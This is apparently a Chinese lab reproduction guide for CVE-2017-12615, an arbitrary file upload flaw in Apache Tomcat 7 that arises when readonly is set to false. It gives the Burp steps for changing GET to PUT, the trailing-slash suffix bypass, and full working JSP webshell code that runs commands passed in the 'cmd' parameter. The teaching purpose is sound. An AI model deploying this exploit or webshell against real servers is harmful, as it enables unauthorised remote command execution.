CVE-2017-12615
漏洞原理
配置文件(conf/web.xml)中的readonly设置为false,只读属性被关闭导致任意文件上传漏洞。
影响版本
Apache Tomcat 7.0.0 - 7.0.79
漏洞复现
1.开启环境
命令:docker-compose up -d
docker ps
2.查看IP访问8080端口,进入到tomcat界面
3.开启burp,刷新页面抓包
4.将GET改为PUT后面跟上文件名,在该数据包最后一行写入jsp木马。
注意:该漏洞的成因就是文件上传限制绕过
绕过方法:上传文件后缀名加/
连接密码为cmd。
jsp木马:
<%
java.io.InputStream is = Runtime.getRuntime()
.exec(request.getParameter("cmd"))
.getInputStream();
int a = -1;
byte[] b = new byte[2048];
while ((a = is.read(b)) != -1) {
out.print(new String(b));
}
%>
5.放包
6./cmd.jsp?cmd=whoami,访问该jsp木马
可以通过给cmd传递系统命令
也可以使用webshell管理工具进行连接
实验结束,感谢观看